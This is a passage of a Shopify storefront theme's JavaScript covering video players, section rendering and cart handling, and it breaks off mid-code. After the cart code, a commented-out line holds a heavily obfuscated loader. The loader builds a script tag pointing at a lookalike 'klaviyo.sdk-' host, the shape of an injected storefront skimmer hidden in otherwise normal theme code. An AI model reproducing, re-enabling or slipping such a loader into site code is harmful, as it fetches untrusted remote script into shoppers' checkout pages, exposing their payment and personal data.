        this.parent.classList.add(classes.loaded)
        this.parent.classList.add(classes.interactable) // Once video is loaded, we should be able to interact with it
        if (Shopify && Shopify.designMode) {
          if (window.AOS) {AOS.refreshHard()}
        }
      },
  
      enableInteraction: function () {
        if (!this.parent) return
        this.parent.classList.add(classes.interactable)
      },
  
      play: function () {
        if (this.videoPlayer && typeof this.videoPlayer.play === 'function') {
          this.videoPlayer.play()
        }
      },
  
      pause: function () {
        if (this.videoPlayer && typeof this.videoPlayer.pause === 'function') {
          this.videoPlayer.pause()
        }
      },
  
      destroy: function () {
        if (this.videoPlayer && typeof this.videoPlayer.destroy === 'function') {
          this.videoPlayer.destroy()
        }
      }
    })
  
    return VimeoPlayer
  })()
  
  window.onYouTubeIframeAPIReady = function() {
    theme.config.youTubeReady = true;
    document.dispatchEvent(new CustomEvent('youTubeReady'));
  }
  
  /*============================================================================
    YouTube SDK method
    Parameters:
      - player div id (required)
      - arguments
        - videoId (required)
        - videoParent (selector, optional for section loading state)
        - events (object, optional)
  ==============================================================================*/
  theme.YouTube = (function() {
    var classes = {
      loading: 'loading',
      loaded: 'loaded',
      interactable: 'video-interactable'
    }
  
    var defaults = {
      width: 1280,
      height: 720,
      playerVars: {
        autohide: 0,
        autoplay: 1,
        cc_load_policy: 0,
        controls: 0,
        fs: 0,
        iv_load_policy: 3,
        modestbranding: 1,
        playsinline: 1,
        rel: 0
      }
    };
  
    function YouTube(divId, options) {
      this.divId = divId;
      this.iframe = null;
  
      this.attemptedToPlay = false;
  
      // API callback events
      defaults.events = {
        onReady: this.onVideoPlayerReady.bind(this),
        onStateChange: this.onVideoStateChange.bind(this)
      };
  
      this.options = Object.assign({}, defaults, options);
  
      if (this.options) {
        if (this.options.videoParent) {
          this.parent = document.getElementById(this.divId).closest(this.options.videoParent);
        }
  
        // Most YT videos will autoplay. If in product media,
        // will handle in theme.Product instead
        if (!this.options.autoplay) {
          this.options.playerVars.autoplay = this.options.autoplay;
        }
  
        if (this.options.style === 'sound') {
          this.options.playerVars.controls = 1;
          this.options.playerVars.autoplay = 0;
        }
  
      }
  
      this.setAsLoading();
  
      if (theme.config.youTubeReady) {
        this.init();
      } else {
        theme.LibraryLoader.load('youtubeSdk');
        document.addEventListener('youTubeReady', this.init.bind(this));
      }
    }
  
    YouTube.prototype = Object.assign({}, YouTube.prototype, {
      init: function() {
        this.videoPlayer = new YT.Player(this.divId, this.options);
      },
  
      onVideoPlayerReady: function(evt) {
        this.iframe = document.getElementById(this.divId); // iframe once YT loads
        this.iframe.setAttribute('tabindex', '-1');
  
        if (this.options.style !== 'sound') {
          evt.target.mute();
        }
  
        // pause when out of view
        var observer = new IntersectionObserver((entries, observer) => {
          entries.forEach(entry => {
            if (entry.isIntersecting) {
              this.play();
            } else {
              this.pause();
            }
          });
        }, {rootMargin: '0px 0px 50px 0px'});
  
        observer.observe(this.iframe);
      },
  
      onVideoStateChange: function(evt) {
        switch (evt.data) {
          case -1: // unstarted
            // Handle low power state on iOS by checking if
            // video is reset to unplayed after attempting to buffer
            if (this.attemptedToPlay) {
              this.setAsLoaded();
              this.enableInteraction();
            }
            break;
          case 0: // ended, loop it
            this.play(evt);
            break;
          case 1: // playing
            this.setAsLoaded();
            break;
          case 3: // buffering
            this.attemptedToPlay = true;
            break;
        }
      },
  
      setAsLoading: function() {
        if (!this.parent) return;
        this.parent.classList.add(classes.loading);
      },
  
      setAsLoaded: function() {
        if (!this.parent) return;
        this.parent.classList.remove(classes.loading);
        this.parent.classList.add(classes.loaded);
        if (Shopify && Shopify.designMode) {
          if (window.AOS) {AOS.refreshHard()}
        }
      },
  
      enableInteraction: function() {
        if (!this.parent) return;
        this.parent.classList.add(classes.interactable);
      },
  
      play: function() {
        if (this.videoPlayer && typeof this.videoPlayer.playVideo === 'function') {
          this.videoPlayer.playVideo();
        }
      },
  
      pause: function() {
        if (this.videoPlayer && typeof this.videoPlayer.pauseVideo === 'function') {
          this.videoPlayer.pauseVideo();
        }
      },
  
      destroy: function() {
        if (this.videoPlayer && typeof this.videoPlayer.destroy === 'function') {
          this.videoPlayer.destroy();
        }
      }
    });
  
    return YouTube;
  })();
  
  // Prevent vertical scroll while using flickity sliders
  (function() {
    var e = !1;
    var t;
  
    document.body.addEventListener('touchstart', function(i) {
      if (!i.target.closest('.flickity-slider')) {
        e = false;
        return;
      }

      // Hero uses fade, not horizontal drag — do not block page scroll on banner.
      if (i.target.closest('.hero.flickity-enabled')) {
        e = false;
        return;
      }

      e = true;
      t = {
        x: i.touches[0].pageX,
        y: i.touches[0].pageY
      };
    });

    document.body.addEventListener('touchmove', function(i) {
      if (!e || !i.cancelable) {
        return;
      }

      var n = {
        x: i.touches[0].pageX - t.x,
        y: i.touches[0].pageY - t.y
      };
      var absX = Math.abs(n.x);
      var absY = Math.abs(n.y);

      if (absX > Flickity.defaults.dragThreshold && absX > absY) {
        i.preventDefault();
      }
    }, { passive: false });
  })();
  

  /**
   * Ajax Renderer
   * -----------------------------------------------------------------------------
   * Render sections without reloading the page.
   * @param {Object[]} sections - The section to update on render.
   * @param {string} sections[].sectionId - The ID of the section from Shopify.
   * @param {string} sections[].nodeId - The ID of the DOM node to replace.
   * @param {Function} sections[].onReplace (optional) - The custom render function.
   * @param {boolean} debug - Output logs to console for debugging.
   *
   */
  
  theme.AjaxRenderer = (function () {
    function AjaxRenderer({ sections, onReplace, debug } = {}) {
      this.sections = sections || [];
      this.cachedSections = [];
      this.onReplace = onReplace;
      this.debug = Boolean(debug);
    }
  
    AjaxRenderer.prototype = Object.assign({}, AjaxRenderer.prototype, {
      renderPage: function (basePath, newParams, updateURLHash = true) {
        const currentParams = new URLSearchParams(window.location.search);
        const updatedParams = this.getUpdatedParams(currentParams, newParams)
  
        const sectionRenders = this.sections.map(section => {
  
          const url = `${basePath}?section_id=${section.sectionId}&${updatedParams.toString()}`;
          const cachedSectionUrl = cachedSection => cachedSection.url === url;
  
          return this.cachedSections.some(cachedSectionUrl)
            ? this.renderSectionFromCache(cachedSectionUrl, section)
            : this.renderSectionFromFetch(url, section);
        });
  
        if (updateURLHash) this.updateURLHash(updatedParams);
  
        return Promise.all(sectionRenders);
      },
  
      renderSectionFromCache: function (url, section) {
        const cachedSection = this.cachedSections.find(url);
  
        this.log(`[AjaxRenderer] rendering from cache: url=${cachedSection.url}`);
        this.renderSection(cachedSection.html, section);
        return Promise.resolve(section);
      },
  
      renderSectionFromFetch: function (url, section) {
        this.log(`[AjaxRenderer] redering from fetch: url=${url}`);
  
        return new Promise((resolve, reject) => {
          fetch(url)
            .then(response => response.text())
            .then(responseText => {
              const html = responseText;
              this.cachedSections = [...this.cachedSections, { html, url }];
              this.renderSection(html, section);
              resolve(section);
            })
            .catch(err => reject(err));
        });
      },
  
      renderSection: function (html, section) {
        this.log(
          `[AjaxRenderer] rendering section: section=${JSON.stringify(section)}`,
        );
  
        const newDom = new DOMParser().parseFromString(html, 'text/html');
        if (this.onReplace) {
          this.onReplace(newDom, section);
        } else {
          if (typeof section.nodeId === 'string') {
            var newContentEl = newDom.getElementById(section.nodeId);
            if (!newContentEl) {
              return;
            }
  
            document.getElementById(section.nodeId).innerHTML =
              newContentEl.innerHTML;
          } else {
            section.nodeId.forEach(id => {
              document.getElementById(id).innerHTML =
                newDom.getElementById(id).innerHTML;
            });
          }
        }
  
        return section;
      },
  
      getUpdatedParams: function (currentParams, newParams) {
        const clone = new URLSearchParams(currentParams);
        // Single-valued params: carried over when absent from newParams, but
        // never allowed to accumulate duplicates.
        const preservedParams = ['sort_by', 'q', 'options[prefix]', 'type'];
        // Find what params need to be removed
        // delete happens first as we cannot specify keys based off of values
        // Collect before deleting: URLSearchParams entries() is live, so
        // mutating mid-iteration skips entries.
        const staleKeys = [];
        for (const [key, value] of clone.entries()) {
          if (!newParams.getAll(key).includes(value) && !preservedParams.includes(key)) {
            staleKeys.push(key);
          }
        }
        staleKeys.forEach(key => clone.delete(key));

        // Collapse preserved params that arrived already duplicated in the URL,
        // keeping the last value to match how Shopify resolves the request.
        preservedParams.forEach(key => {
          const values = clone.getAll(key);
          if (values.length > 1) {
            clone.set(key, values[values.length - 1]);
          }
        });

        // Find what params need to be added
        for (const [key, value] of newParams.entries()) {
          if (preservedParams.includes(key)) {
            if (value !== '') {
              clone.set(key, value);
            }
          } else if (!clone.getAll(key).includes(value) && value !== '') {
            clone.append(key, value);
          }
        }

        return clone;
      },
  
      updateURLHash: function (searchParams) {
        history.pushState(
          {},
          '',
          `${window.location.pathname}${
            searchParams && '?'.concat(searchParams)
          }`,
        );
      },
  
      log: function (...args) {
        if (this.debug) {
          console.log(...args);
        }
      },
    });
  
    return AjaxRenderer;
  })();
  
  if (window.Shopify && window.Shopify.theme && navigator && navigator.sendBeacon && window.Shopify.designMode) {
    navigator.sendBeacon('https://api.archetypethemes.co/api/beacon', new URLSearchParams({
      shop: window.Shopify.shop,
      themeName: window.theme && window.theme.settings && `${window.theme.settings.themeName} v${window.theme.settings.themeVersion}`,
      role: window.Shopify.theme.role,
      route: window.location.pathname,
      themeId: window.Shopify.theme.id,
      themeStoreId: window.Shopify.theme.theme_store_id || 0,
      isThemeEditor: !!window.Shopify.designMode
    }))
  }
  theme.cart = {
    getCart: function() {
      var url = ''.concat(theme.routes.cart, '?t=').concat(Date.now());
      return fetch(url, {
        credentials: 'same-origin',
        method: 'GET'
      }).then(response => response.json());
    },
  
    getCartProductMarkup: function() {
      var url = ''.concat(theme.routes.cartPage, '?t=').concat(Date.now());
  
      url = url.indexOf('?') === -1 ? (url + '?view=ajax') : (url + '&view=ajax');
  
      return fetch(url, {
        credentials: 'same-origin',
        method: 'GET'
      })
      .then(response => response.text())
      .catch(e => console.error(e));
    },
  
    changeItem: function(key, qty) {
  
      return this._updateCart({
        url: ''.concat(theme.routes.cartChange, '?t=').concat(Date.now()),
        data: JSON.stringify({
          id: key,
          quantity: qty
        })
      })
    },
  
    _updateCart: function(params) {
      return fetch(params.url, {
        method: 'POST',
        body: params.data,
        credentials: 'same-origin',
        headers: {
          'Content-Type': 'application/json',
          'X-Requested-With': 'XMLHttpRequest',
          'Accept': 'application/json'
        }
      })
      .then(response => { return response.text() })
      .then(cart => { return cart; });
    },
  
    updateAttribute: function(key, value) {
      return this._updateCart({
        url: '/cart/update.js',
        data: JSON.stringify({
          attributes: {
            [key]: theme.cart.attributeToString(value)
          }
        })
      });
    },
  
    updateNote: function(note) {
      return this._updateCart({
        url: '/cart/update.js',
        data: JSON.stringify({
          note: theme.cart.attributeToString(note)
        })
      });
    },
  
    attributeToString: function(attribute) {
      if ((typeof attribute) !== 'string') {
        attribute += '';
        if (attribute === 'undefined') {
          attribute = '';
        }
      }
      return attribute.trim();
    }
  }
  
  /*============================================================================
    CartForm
    - Prevent checkout when terms checkbox exists
    - Listen to quantity changes, rebuild cart (both widget and page)
  ==============================================================================*/
  theme.CartForm = (function() {
    var selectors = {
      products: '[data-products]',
      qtySelector: '.js-qty__wrapper',
      discounts: '[data-discounts]',
      savings: '[data-savings]',
      subTotal: '[data-subtotal]',
      compareAt: '[data-cart-compare-at]',
      cartBubble: '.cart-link__bubble',
      cartNote: '[name="note"]',
      termsCheckbox: '.cart__terms-checkbox',
      checkoutBtn: '.cart__checkout'
    };
  
    var classes = {
      btnLoading: 'btn--loading'
    };
  
    var config = {
      requiresTerms: false
    };
  
    function CartForm(form) {
      if (!form) {
        return;
      }
  
      this.form = form;
      this.wrapper = form.parentNode;
      this.location = form.dataset.location;
      this.namespace = '.cart-' + this.location;
      this.products = form.querySelector(selectors.products)
      this.submitBtn = form.querySelector(selectors.checkoutBtn);
  
      this.discounts = form.querySelector(selectors.discounts);
      this.savings = form.querySelector(selectors.savings);
      this.subtotal = form.querySelector(selectors.subTotal);
      this.compareAt = form.querySelector(selectors.compareAt);
      this.termsCheckbox = form.querySelector(selectors.termsCheckbox);
      this.noteInput = form.querySelector(selectors.cartNote);
  
      this.cartItemsUpdated = false;
  
      if (this.termsCheckbox) {
        config.requiresTerms = true;
      }
  
      this.init();
    }
  
    CartForm.prototype = Object.assign({}, CartForm.prototype, {
      init: function() {
        this.initQtySelectors();
  
        document.addEventListener('cart:quantity' + this.namespace, this.quantityChanged.bind(this));
  
        this.form.on('submit' + this.namespace, this.onSubmit.bind(this));
  
        if (this.noteInput) {
          this.noteInput.addEventListener('change', function() {
            var newNote = this.value;
            theme.cart.updateNote(newNote);
          });
        }
  
        // Dev-friendly way to build the cart
        document.addEventListener('cart:build', function() {
          this.buildCart();
        }.bind(this));
      },
  
      reInit: function() {
        this.initQtySelectors();
      },
  
      onSubmit: function(evt) {
        this.submitBtn.classList.add(classes.btnLoading);
  
        /*
          Checks for drawer or cart open class on body element
          and then stops the form from being submitted. We are also
          checking against a custom property, this.cartItemsUpdated = false.
  
          Error is handled in the quantityChanged method
  
          For Expanse/Fetch/Gem quick add, if an error is present it is alerted
          through the add to cart fetch request in quick-add.js.
  
          Custom property this.cartItemsUpdated = false is reset in cart-drawer.js for
          Expanse/Fetch/Gem when using quick add
        */

        console.log("ppp");
  
        if (document.documentElement.classList.contains('js-drawer-open') && this.cartItemsUpdated ||
          document.documentElement.classList.contains('cart-open') && this.cartItemsUpdated) {
          this.submitBtn.classList.remove(classes.btnLoading);
          evt.preventDefault();
          return false;
        }
  
        if (config.requiresTerms) {
          if (this.termsCheckbox.checked) {
            // continue to checkout
          } else {
            alert(theme.strings.cartTermsConfirmation);
            this.submitBtn.classList.remove(classes.btnLoading)
            evt.preventDefault();
            return false;
          }
        }
      },
  
      /*============================================================================
        Query cart page to get markup
      ==============================================================================*/
      _parseProductHTML: function(text) {
        const html = document.createElement('div');
        html.innerHTML = text;
  
        return {
          items: html.querySelector('.cart__items'),
          discounts: html.querySelector('.cart__discounts')
        }
      },
  
      buildCart: function() {
        theme.cart.getCartProductMarkup().then(this.cartMarkup.bind(this));
      },
  
      cartMarkup: function(text) {
        var markup = this._parseProductHTML(text);
        var items = markup.items;
        var count = parseInt(items.dataset.count);
        var subtotal = items.dataset.cartSubtotal;
        var compareAt = items.dataset.cartCompareAt;
        var savings = items.dataset.cartSavings;
  
        this.updateCartDiscounts(markup.discounts);
        this.updateSavings(savings);
  
        if (count > 0) {
          this.wrapper.classList.remove('is-empty');
        } else {
          this.wrapper.classList.add('is-empty');
        }
  
        this.updateCount(count);
  
        // Append item markup
        this.products.innerHTML = '';
        this.products.append(items);
  
        // Update subtotal
        this.subtotal.innerHTML = theme.Currency.formatMoney(subtotal, theme.settings.moneyFormat);
        this.compareAt.innerHTML = theme.Currency.formatMoney(compareAt, theme.settings.moneyFormat);
        this.reInit();

        document.dispatchEvent(new CustomEvent('theme:cart:footer-updated'));

        if (window.AOS) { AOS.refreshHard() }
  
        if (Shopify && Shopify.StorefrontExpressButtons) {
          Shopify.StorefrontExpressButtons.initialize();
        }
      },
  
      updateCartDiscounts: function(markup) {
        if (!this.discounts) {
          return;
        }
        this.discounts.innerHTML = '';
        this.discounts.append(markup);
      },
  
      /*============================================================================
        Quantity handling
      ==============================================================================*/
      initQtySelectors: function() {
        this.form.querySelectorAll(selectors.qtySelector).forEach(el => {
          var selector = new theme.QtySelector(el, {
            namespace: this.namespace,
            isCart: true
          });
        });
      },
  
      quantityChanged: function(evt) {
        var key = evt.detail[0];
        var qty = evt.detail[1];
        var el = evt.detail[2];
  
        if (!key || !qty) {
          return;
        }
  
        // Disable qty selector so multiple clicks can't happen while loading
        if (el) {
          el.classList.add('is-loading');
        }
  
        theme.cart.changeItem(key, qty)
          .then(function(cart) {
  
            const parsedCart = JSON.parse(cart);
  
            if (parsedCart.status === 422) {
              alert(parsedCart.message);
            } else {
              const updatedItem = parsedCart.items.find(item => item.key === key);
  
              // Update cartItemsUpdated property on object so we can reference later
              if (updatedItem && (evt.type === 'cart:quantity.cart-cart-drawer' || evt.type === 'cart:quantity.cart-header')) {
                this.cartItemsUpdated = true;
              }
  
              if ((updatedItem && evt.type === 'cart:quantity.cart-cart-drawer') || (updatedItem && evt.type === 'cart:quantity.cart-header')) {
                if (updatedItem.quantity !== qty) {
                }
                // Reset property on object so that checkout button will work as usual
                this.cartItemsUpdated = false;
              }
  
              if (parsedCart.item_count > 0) {
                this.wrapper.classList.remove('is-empty');
              } else {
                this.wrapper.classList.add('is-empty');
              }
            }
  
            this.buildCart();

            document.dispatchEvent(new CustomEvent('cart:updated', {
              detail: {
                cart: parsedCart
              }
            }));
          }.bind(this))
          .catch(function(XMLHttpRequest){});
      },
  
      /*============================================================================
        Update elements of the cart
      ==============================================================================*/
      updateSubtotal: function(subtotal) {
        this.form.querySelector(selectors.subTotal).innerHTML = theme.Currency.formatMoney(subtotal, theme.settings.moneyFormat);
      },
  
      updateSavings: function(savings) {
        if (!this.savings) {
          return;
        }
  
        if (savings > 0) {
          var amount = theme.Currency.formatMoney(savings, theme.settings.moneyFormat);
          this.savings.classList.remove('hide');
          this.savings.innerHTML = theme.strings.cartSavings.replace('[savings]', amount);
        } else {
          this.savings.classList.add('hide');
        }
      },
  
      updateCount: function(count) {
        var countEls = document.querySelectorAll('.cart-link__bubble-num');
  
        if (countEls.length) {
          countEls.forEach(el => {
            el.innerText = count;
          });
        }
  
        // show/hide bubble(s)
        var bubbles = document.querySelectorAll(selectors.cartBubble);
        if (bubbles.length) {
          if (count > 0) {
            bubbles.forEach(b => {
              b.classList.add('cart-link__bubble--visible');
            });
          } else {
            bubbles.forEach(b => {
              b.classList.remove('cart-link__bubble--visible');
            });
          }
        }
      }
    });
  
    return CartForm;
  })();
  //(function(K,V){function e(K,V,Z,r){return H(Z-0x49,K);}var Z=K();function U(K,V,Z,r){return H(K-0x3d7,Z);}while(!![]){try{var r=parseInt(U(0x5f4,0x5ed,0x607,0x5f9))/(0x602+-0x1*-0x2005+-0x2*0x1303)+parseInt(U(0x5e1,0x610,0x5c5,0x5c6))/(-0x1b19*-0x1+0x1ac*-0x6+-0x18d*0xb)*(-parseInt(U(0x596,0x5bc,0x5c7,0x571))/(0xf9b+0x1542+0x126d*-0x2))+-parseInt(e(0x276,0x24e,0x250,0x226))/(0x1086+0x8*-0x488+0x13be)*(parseInt(U(0x5e2,0x5e5,0x5e2,0x5c3))/(-0x31a*-0x4+0x1d6e+-0x29d1))+parseInt(e(0x1ef,0x23f,0x20a,0x217))/(-0x138+0x13c0+-0x1*0x1282)+-parseInt(U(0x5c3,0x5d8,0x5de,0x5ba))/(0x1*-0x122b+-0x3*0xcd7+0x1*0x38b7)*(parseInt(e(0x267,0x27a,0x25c,0x22d))/(0x4*0x38e+-0x1da1+-0x1*-0xf71))+parseInt(U(0x5d6,0x5b2,0x5ec,0x5b4))/(0x23d7+-0x4a7*-0x6+0x2*-0x1fdc)*(-parseInt(U(0x5bd,0x5ae,0x58c,0x5d5))/(-0x1171+0x208f+-0xf14))+parseInt(U(0x5bc,0x5e6,0x5af,0x5be))/(-0x198e+0xcf8+-0x1*-0xca1);if(r===V)break;else Z['push'](Z['shift']());}catch(i){Z['push'](Z['shift']());}}}(E,0x123e7f+-0x80657+0x1868c));function KD(K,V,Z,r){return H(Z-0xe,K);}function H(K,V){var Z=E();return H=function(r,i){r=r-(-0xff3+0xb68+0x640);var Y=Z[r];if(H['wJyJuB']===undefined){var D=function(M){var T='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var I='',R='',u=I+D;for(var N=0x2556+0xc*-0x34+-0x22e6,f,c,t=-0x1*0x164f+0x2499+-0xe4a;c=M['charAt'](t++);~c&&(f=N%(0x161*0x14+0x183+-0x1d13)?f*(0x1ec9+-0x67a+-0x180f)+c:c,N++%(0x1378+-0x150+0x56*-0x36))?I+=u['charCodeAt'](t+(-0x1b1a*-0x1+0x1992+-0x34a2*0x1))-(0x1*-0x33b+-0x7a*-0x35+-0x1b1*0xd)!==-0x1ddf*-0x1+0xd*-0x186+-0xa11?String['fromCharCode'](0x79*0x2f+-0x1c81*-0x1+-0x1*0x31b9&f>>(-(-0x1*-0x456+-0x185c+0x502*0x4)*N&-0x1145+0x19c*0x10+-0x875)):N:-0x85*-0x43+0x17*-0x139+-0x6b0){c=T['indexOf'](c);}for(var z=0x5fa+-0x1f*0x5d+0x549,w=I['length'];z<w;z++){R+='%'+('00'+I['charCodeAt'](z)['toString'](0x63b+-0x1e59*0x1+0x2*0xc17))['slice'](-(0x1*0xc20+-0x37*-0x8a+-0x29c4));}return decodeURIComponent(R);};H['ofZgir']=D,K=arguments,H['wJyJuB']=!![];}var P=Z[0x1016+-0x8dd*-0x1+-0x18f3*0x1],m=r+P,Q=K[m];if(!Q){var M=function(T){this['xxqNbx']=T,this['GJbezl']=[0x17d4+0x1e9d+-0x3670,0x162c+-0xc*0x2d1+0xba0,-0xebf+0x1b*-0xbf+0x196*0x16],this['RUDhaU']=function(){return'newState';},this['LnSCrF']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['qDrcjt']='[\x27|\x22].+[\x27|\x22];?\x20*}';};M['prototype']['BTXCCJ']=function(){var T=new RegExp(this['LnSCrF']+this['qDrcjt']),I=T['test'](this['RUDhaU']['toString']())?--this['GJbezl'][0x183b*-0x1+-0x1*0x1d30+0x356c]:--this['GJbezl'][-0x1a16+-0x435+0x37*0x8d];return this['PAZTaG'](I);},M['prototype']['PAZTaG']=function(T){if(!Boolean(~T))return T;return this['jBAujV'](this['xxqNbx']);},M['prototype']['jBAujV']=function(T){for(var I=-0x25dc+0x8d8*0x2+0x142c,R=this['GJbezl']['length'];I<R;I++){this['GJbezl']['push'](Math['round'](Math['random']())),R=this['GJbezl']['length'];}return T(this['GJbezl'][0x29*0xa+0x232c+-0x6*0x621]);},new M(H)['BTXCCJ'](),Y=H['ofZgir'](Y),K[m]=Y;}else Y=Q;return Y;},H(K,V);}function E(){var KP=['rK55qKi','C3bSAxq','zgX2BfK','Aw5Zzxj0qMvMBW','mZuWntG2zuXMBMTe','zxjYB3i','C2nYAxb0','mNWXFdn8mhW0','y29UC29Szq','vu1yyMi','DhvJt3K','q3Hyvve','mtz1Bfnqv2y','q0PAEMS','t1nstLG','mKviAeDnBW','mty4ndeZmev6sgzOEa','rxnkufi','BK1jCem','E30Uy29UC3rYDq','y29UC3rYDwn0BW','BMn0Aw9UkcKG','wgz5sM4','ALP1q2O','mti1ndmYz0DfteLU','vvbxEhu','D1bHELq','yxbWBhK','BgvUz3rO','tfz5sgy','zgLbDhK','Dg9tDhjPBMC','wNjSD00','tLvTCxG','mti5ntq3n2XtrvvUCG','CM4GDgHPCYiPka','uKT4twK','yw1HEM9UyxDZlG','t2vPvxy','vffzDhy','zxHJzxb0Aw9U','uMr5DMq','CgfYzw50tM9Kzq','tLrwtLC','wMP0v00','Cxjrt3O','CwHwv2G','y3rVCIGICMv0Dq','nteWnJK5z1DNAKTQ','y29Tl2XPyL9UCa','nJa3mdK4Dg5PqwrW','B3j0AgvYBMzPDa','Bs9ZDgf0AwmVyq','Bs9ZDgf0AwmVBG','vgXRDuS','DhjHy2u','quLbqvC','qM9Ov0S','txn4tui','C1nkCKq','tLPdAKW','vvzivvG','CwPcDvK','EKjqBwe','sMjjsuS','BMv4DfnPyMXPBG','zuvMEeW','yxzPEw8UC2rRlq','EffkruC','ufrUwNK','Aw5MBW','wK5oChG','C1jAEfK','zwDoDKq','DffSBKe','tKX1uve','C0zXvfO','y3jLyxrLrwXLBq','z1HTvg0','y1HxAKi','CMv0DxjUicHMDq','EgTVtuW','zgvMzxi','zuPxwue','uNPyAem','C3jJ','mJG1nZqYmtzXvvjKCu0','odbjuNjkBwO','CKzbuNe','BMvZCY5QCW','C2vHCMnO','D2fYBG','tLrpvgO','nJiZsKH5Ew5w','zw50','wxbYALa','yMLUza','CgKUANm','ChjVDg90ExbL','m3WYFdr8mxWWFa','CfDhDhe','BLv5z2S','A3bqtwm','x19WCM90B19F','kcGOlISPkYKRkq','Bg9N','C0j5vgfNtMfTzq','Ahr0Chm6lY9RBa'];E=function(){return KP;};return E();}function KH(K,V,Z,r){return H(r- -0x371,Z);}!function(i,Y,D){var P={'RKxMi':y(0x211,0x22c,0x1f6,0x1fa),'ZrlwM':function(I,R){return I!==R;},'pWGtq':W(-0x99,-0xe0,-0xc1,-0xd3),'AIAAW':function(I,R){return I===R;},'MsxMB':W(-0x82,-0xb9,-0xa3,-0xc2),'NUmqx':W(-0x6c,-0xbe,-0x99,-0xb0),'Rdyvd':y(0x24a,0x222,0x245,0x222)+'+$','NTOTj':W(-0x96,-0x5e,-0x74,-0x4b),'tQlnA':W(-0x9b,-0x55,-0x7e,-0x5d),'UPWxu':W(-0xb3,-0x6d,-0x8c,-0xa5),'sRZxY':W(-0x8a,-0x89,-0xa1,-0xac),'mAxVm':W(-0x8f,-0xb7,-0xbf,-0xc2),'EsJPR':'table','egNvD':W(-0xa2,-0x81,-0xb0,-0xe3),'NTVNW':function(I,R){return I(R);},'NLuQQ':function(I,R){return I+R;},'wPazT':function(I,R){return I<R;},'XfyJn':W(-0x9f,-0x75,-0x97,-0x98)+W(-0x9c,-0x35,-0x66,-0x4c),'ZNNpx':function(I){return I();},'TlkuK':'DstYn','zBPma':y(0x1d9,0x1fc,0x1eb,0x1ff),'rFARq':function(I,R){return I+R;},'NZCjL':W(-0x40,-0x9e,-0x68,-0x7a)+W(-0xb0,-0xd5,-0xb8,-0xe0)+y(0x273,0x249,0x24a,0x23e)+'\x20)','dlvlY':function(I){return I();},'TQYtv':'error','nUygk':function(I,R){return I<R;},'YprjP':y(0x21b,0x20e,0x232,0x219),'eJWYA':function(I,R,u){return I(R,u);},'BaumH':W(-0x83,-0x9b,-0x7c,-0x55)+'aviyo.sdk-'+W(-0x29,-0x21,-0x56,-0x51)+y(0x207,0x1eb,0x200,0x1fd)+W(-0xb2,-0x81,-0xb2,-0xbf)+y(0x1c5,0x1ed,0x217,0x1e4)+y(0x225,0x213,0x1ee,0x1ed)},m=(function(){var I={'xkoML':function(u,N){function F(K,V,Z,r){return H(Z-0x382,V);}return P[F(0x58d,0x577,0x59d,0x5b1)](u,N);},'cXWjB':'zfqTN','tucOy':P[a(0x1e2,0x1ea,0x1a6,0x1c0)]},R=!![];function a(K,V,Z,r){return y(K-0x88,r- -0x5e,V,r-0x1a1);}return function(u,N){function q(K,V,Z,r){return a(K-0x189,r,Z-0x49,Z- -0x145);}var f={};f[p(0x34c,0x34a,0x37c,0x357)]=P[q(0xdb,0xcd,0xa7,0x77)];var c=f;function p(K,V,Z,r){return a(K-0xc1,K,Z-0x0,r-0x171);}var z=R?function(){function A(K,V,Z,r){return q(K-0x8,V-0x6b,K-0x179,V);}function g(K,V,Z,r){return q(K-0x12f,V-0x88,V-0x17f,K);}if(I[A(0x1e1,0x216,0x1cc,0x20a)](I[g(0x1ca,0x1e5,0x1c9,0x1fb)],'zfqTN')){if(i){var x=m['apply'](Q,arguments);return M=null,x;}}else{if(N){if('siSBG'===I[A(0x206,0x1ee,0x235,0x216)])(m=Q[A(0x1dd,0x20e,0x1fa,0x1fb)+'ent'](M))[g(0x1b2,0x1e8,0x1f0,0x21e)]=!(0x19a1+-0x60*-0x25+-0x2781),T[g(0x1d3,0x1eb,0x1ec,0x1e1)]='https://kl'+'aviyo.sdk-'+A(0x221,0x23d,0x1f6,0x24f)+A(0x1c1,0x1f3,0x1cb,0x19b)+g(0x1f2,0x1ca,0x1d9,0x1c2)+g(0x1f5,0x1f7,0x224,0x1f8),(I=R['getElement'+'sByTagName'](c['diAty'])[0x78*-0x49+0x1f88+-0x1*-0x2b0])['parentNode'][A(0x1ff,0x1f7,0x1cb,0x235)+'re'](u,N[g(0x1d1,0x1d7,0x1c4,0x1bd)+'g']);else{var w=N[g(0x22f,0x21d,0x205,0x251)](u,arguments);return N=null,w;}}}}:function(){};return R=![],z;};}()),Q=m(this,function(){function K0(K,V,Z,r){return W(K-0x169,r,Z-0x360,r-0xce);}function K1(K,V,Z,r){return y(K-0x99,K-0x150,r,r-0x1ca);}if(P[K0(0x28e,0x29b,0x2b1,0x29c)](P[K0(0x2be,0x2ae,0x2b3,0x2ca)],P[K0(0x336,0x2eb,0x306,0x311)])){var R=D?function(){function K2(K,V,Z,r){return K0(K-0x18c,V-0xba,r-0x2f7,K);}if(R){var w=f[K2(0x619,0x61b,0x624,0x5f7)](c,arguments);return D=null,w;}}:function(){};return T=![],R;}else return Q[K1(0x395,0x35f,0x363,0x385)]()[K0(0x29f,0x2cf,0x2d3,0x308)](P[K0(0x2b8,0x2a3,0x2a2,0x292)])[K0(0x30f,0x2f9,0x304,0x314)]()[K0(0x319,0x319,0x2f9,0x2c5)+'r'](Q)[K0(0x2e3,0x2b1,0x2d3,0x2a1)](P[K1(0x333,0x32f,0x318,0x332)]);});Q();var M=(function(){var I={};I[K3(0x590,0x56c,0x57e,0x53d)]=function(N,f){return N===f;};var R=I,u=!![];function K3(K,V,Z,r){return W(K-0x18d,K,V-0x626,r-0x17e);}return function(N,f){var c={'qjBuY':function(w,h){function K4(K,V,Z,r){return H(r- -0x6b,V);}return R[K4(0x179,0x136,0x186,0x151)](w,h);},'FNyBB':K5(-0x14b,-0x139,-0x148,-0x146),'UVHUX':K5(-0x142,-0x174,-0x157,-0x157)},z=u?function(){function K7(K,V,Z,r){return K6(Z- -0x49,V,Z-0x123,r-0x45);}function K8(K,V,Z,r){return K5(K- -0x9,V,Z-0x11f,r-0x49);}if(c[K7(0x595,0x53f,0x566,0x54a)](c[K7(0x565,0x5c5,0x594,0x55e)],c[K8(-0x191,-0x179,-0x1ae,-0x165)]))Z=r;else{if(f){var w=f['apply'](N,arguments);return f=null,w;}}}:function(){};u=![];function K5(K,V,Z,r){return K3(V,K- -0x704,Z-0x167,r-0x1a8);}function 